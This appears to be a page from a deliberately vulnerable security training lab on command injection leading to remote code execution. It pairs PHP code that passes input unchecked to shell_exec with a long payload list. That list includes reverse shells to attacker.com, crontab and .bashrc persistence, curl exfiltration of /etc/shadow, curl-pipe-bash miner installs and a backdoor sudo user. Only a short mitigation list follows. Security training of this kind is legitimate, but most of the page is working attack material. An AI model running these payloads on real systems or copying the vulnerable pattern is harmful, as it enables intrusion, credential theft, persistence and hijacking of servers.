Lab 5: Command Injection with RCE

Command injection leading to Remote Code Execution

Difficulty: High

Lab Overview

This lab demonstrates the most dangerous form of command injection vulnerability where command injection can lead to Remote Code Execution (RCE). This is the ultimate goal of command injection attacks and represents the highest risk to applications.

Objective: Achieve Remote Code Execution through command injection vulnerabilities.

RCE Vulnerable Code 
// Vulnerable: Direct execution leading to RCE
function execute_command_rce($command) {
    if (empty($command)) {
        return "No command specified.";
    }
    
    // Vulnerable: Direct execution using shell_exec
    $output = @shell_exec($command . ' 2>&1');
    
    if ($output === null) {
        return "Command execution failed or no output.";
    }
    
    return $output;
}
RCE Command Execution
⚠️ RCE WARNING

This lab demonstrates RCE vulnerabilities. The following can execute arbitrary commands:

  • whoami - Basic command
  • id; ls - Multiple commands
  • cat /etc/passwd - File reading
  • ps aux - Process listing
Available Commands

Try these basic commands:

  • whoami - Current user
  • id - User ID information
  • pwd - Current directory
  • ls - List files
  • uname -a - System information
Vulnerability Details
  • Type: Command Injection with RCE
  • Severity: Critical
  • Method: POST
  • Issue: Direct command execution leading to RCE
RCE Payloads
  • whoami - Basic RCE
  • id; ls - Multiple commands
  • cat /etc/passwd - File reading
  • ps aux - Process listing
Command Injection RCE Payloads

Use these payloads to achieve Remote Code Execution:

1. Basic RCE Payloads:
whoami id pwd ls uname -a hostname date
2. Information Gathering RCE:
whoami id pwd uname -a hostname date uptime who w
3. File System Access RCE:
ls -la cat /etc/passwd cat /etc/hosts cat /etc/shadow cat /proc/version cat /proc/cpuinfo cat /proc/meminfo cat /proc/loadavg
4. Process and System Information RCE:
ps aux ps -ef netstat -an ss -tuln lsof -i df -h free -m top htop
5. Network Information RCE:
ifconfig ip addr route -n arp -a nslookup google.com ping -c 3 8.8.8.8 traceroute google.com nmap localhost
6. User and Permission Information RCE:
groups sudo -l crontab -l history env printenv who w last lastlog
7. Multiple Command Execution RCE:
whoami; id; pwd ls -la; cat /etc/passwd ps aux; netstat -an whoami && id && pwd whoami || id || pwd whoami | id | pwd
8. Command Substitution RCE:
echo $(whoami) echo `id` echo $(cat /etc/passwd) echo `ls -la` echo $(ps aux) echo `netstat -an`
9. Pipe and Redirection RCE:
whoami | cat id > /tmp/output.txt ls -la | grep php cat /etc/passwd | head -5 ps aux | grep apache netstat -an | grep LISTEN
10. Environment Variables RCE:
echo $PATH echo $HOME echo $USER echo $SHELL echo $PWD echo $HOSTNAME echo $LANG echo $TZ
11. File Operations RCE:
touch /tmp/test.txt echo "test" > /tmp/test.txt cat /tmp/test.txt rm /tmp/test.txt mkdir /tmp/testdir rmdir /tmp/testdir chmod 755 /tmp/test.txt chown root /tmp/test.txt
12. Advanced Commands RCE:
find / -name "*.php" 2>/dev/null grep -r "password" /var/www/ 2>/dev/null find / -perm -4000 2>/dev/null find / -writable 2>/dev/null find / -type f -name "*.conf" 2>/dev/null find / -name "*.log" 2>/dev/null
13. Reverse Shell RCE (Dangerous):
bash -i >& /dev/tcp/attacker.com/4444 0>&1 nc -e /bin/bash attacker.com 4444 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker.com",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' perl -e 'use Socket;$i="attacker.com";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
14. Persistence and Backdoors RCE:
echo 'bash -i >& /dev/tcp/attacker.com/4444 0>&1' | crontab - echo '*/5 * * * * bash -i >& /dev/tcp/attacker.com/4444 0>&1' | crontab - echo 'bash -i >& /dev/tcp/attacker.com/4444 0>&1' >> ~/.bashrc echo 'bash -i >& /dev/tcp/attacker.com/4444 0>&1' >> /etc/profile
15. Data Exfiltration RCE:
cat /etc/passwd | curl -X POST -d @- http://attacker.com/steal cat /etc/shadow | curl -X POST -d @- http://attacker.com/steal ps aux | curl -X POST -d @- http://attacker.com/steal netstat -an | curl -X POST -d @- http://attacker.com/steal
16. Lateral Movement RCE:
ssh user@target.com 'whoami' ssh user@target.com 'id' ssh user@target.com 'cat /etc/passwd' ssh user@target.com 'ps aux' ssh user@target.com 'netstat -an'
17. Cryptocurrency Mining RCE:
curl -s https://raw.githubusercontent.com/attacker/miner.sh | bash wget -qO- https://raw.githubusercontent.com/attacker/miner.sh | bash curl -s https://raw.githubusercontent.com/attacker/miner.sh | sh wget -qO- https://raw.githubusercontent.com/attacker/miner.sh | sh
18. System Compromise RCE:
useradd -m -s /bin/bash hacker echo 'hacker:password' | chpasswd usermod -aG sudo hacker echo 'hacker ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers
Real-World Attack Scenarios
Mitigation Strategies
  • Implement proper input validation and sanitization
  • Use whitelist-based command validation
  • Avoid direct command execution functions
  • Use parameterized commands and safe APIs
  • Implement proper access controls and permissions
  • Regular security testing and vulnerability assessments
  • Monitor for unusual command execution patterns